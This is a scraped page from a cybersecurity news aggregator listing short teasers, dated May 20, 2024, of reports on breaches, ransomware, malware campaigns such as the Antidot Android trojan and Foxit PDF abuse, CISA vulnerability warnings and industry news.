Source: www.bleepingcomputer.com – Author: Lawrence Abrams The American Radio Relay League (ARRL) warns it suffered a cyberattack, which disrupted its IT systems and online operations, including email and the Logbook of the World. ARRL is the national association for amateur radio in the United States,   show more ...

representing amateur radio interests to government regulatory bodies, providing technical advice, and […] La entrada American Radio Relay League cyberattack takes Logbook of the World offline – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

Source: www.bleepingcomputer.com – Author: Mayank Parmar Since Google enabled its AI-powered search feature, many people have tried and failed to disable the often incorrect AI Overviews feature in regular search results. Unfortunately, you can’t. However, there are ways to turn it off using a new   show more ...

“Web” search mode, which we explain below. AI Overviews, also known […] La entrada Frustration grows over Google’s AI Overviews feature, how to disable – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added three security vulnerabilities to its ‘Known Exploited Vulnerabilities’ catalog, one impacting Google Chrome and two affecting some D-Link routers. Adding the issues   show more ...

to the KEV catalog serves as a warning to federal agencies and companies that threat actors are leveraging them […] La entrada CISA warns of hackers exploiting Chrome, EoL D-Link bugs – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 British

Source: go.theregister.com – Author: Team Register CyberUK Emotional intelligence was at the heart of the British Library’s widely hailed response to its October ransomware attack, according to CEO Roly Keating. The British Library’s (BL) ransomware attack last year was one of the most damaging in   show more ...

recent memory, at least in the UK. The transparency of […] La entrada British Library’s candid ransomware comms driven by ’emotional intelligence’ – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Chinese

Source: go.theregister.com – Author: Team Register Germany may soon remove Huawei and ZTE equipment from its 5G networks, according to media reports. Bloomberg reported last Friday that Germany’s Foreign Office and Ministry for Economic Affairs support an Interior Ministry proposal to remove the   show more ...

Chinese-made tech on grounds of national security. Under the plan, German telcos […] La entrada Chinese telco gear may become <i>verboten</i> on German networks – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register Infosec in brief Nissan has admitted to another data loss – this time involving the theft of personal information belonging to more than 50,000 Nissan employees. According to the carmaker’s disclosure [PDF], filed with the US state of Maine, Nissan was   show more ...

breached back in November 2023 through “a targeted […] La entrada Nissan infosec in the spotlight again after breach affecting more than 50K US employees – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . May 20, 2024NewsroomCyber Attack / Threat Intelligence An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed as behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice   show more ...

and Karma, respectively. Cybersecurity firm Check Point is tracking the activity under the […] La entrada Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. “This exploit triggers security warnings that could deceive unsuspecting   show more ...

users into executing harmful commands,” Check Point said in […] La entrada Foxit PDF Reader Flaw Exploited by Hackers to Deliver Diverse Malware Arsenal – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . May 20, 2024The Hacker NewsSoftware Security / Vulnerability All developers want to create secure and dependable software. They should feel proud to release their code with the full confidence they did not introduce any weaknesses or anti-patterns into their   show more ...

applications. Unfortunately, developers are not writing their own code for the […] La entrada Defending Your Commits From Known CVEs With GitGuardian SCA And Git Hooks – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Criminals

Source: thehackernews.com – Author: . May 20, 2024NewsroomMalvertising / Cryptocurrency A “multi-faceted campaign” has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka   show more ...

LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. […] La entrada Cyber Criminals Exploit GitHub and FileZilla to Deliver Malware Cocktail – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 American

Source: www.darkreading.com – Author: Apu Pavithran 4 Min Read Source: Egor Kotenko via Alamy Stock Photo After almost a decade of “will they or won’t they,” the United States is on the cusp of its own sweeping data privacy law. The recently proposed American Privacy Rights Act (APRA) aims   show more ...

to establish robust regulations about eight years after […] La entrada What American Enterprises Can Learn From Europe&apos;s GDPR Mistakes – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Android

Source: www.darkreading.com – Author: Nathan Eddy, Contributing Writer Source: the lightwriter via Alamy Stock Photo A banking Trojan impacting Google Android devices, dubbed “Antidot” by the Cyble research team, has emerged, disguising itself as a Google Play update. The malware displays fake   show more ...

Google Play update pages in multiple languages, including German, French, Spanish, Russian, Portuguese, Romanian, and […] La entrada Android Banking Trojan Antidot Disguised as Google Play Update – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.schneier.com – Author: Bruce Schneier IBM is selling its QRadar product suite to Palo Alto Networks, for an undisclosed—but probably surprisingly small—sum. I have a personal connection to this. In 2016, IBM bought Resilient Systems, the startup I was a part of. It became part if IBM’s   show more ...

cybersecurity offerings, mostly and weirdly subservient to […] La entrada IBM Sells Cybersecurity Group – Source: www.schneier.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.troyhunt.com – Author: Troy Hunt This is the 400th time I’ve sat down in front of the camera and done one of these videos. Every single week since the 23rd of September in 2016 regardless of location, health, stress and all sorts of other crazy things that have gone on in my life for […]   show more ...

La entrada Weekly Update 400 – Source: www.troyhunt.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-05
Aggregator history
Monday, May 20
WED
THU
FRI
SAT
SUN
MON
TUE
MayJuneJuly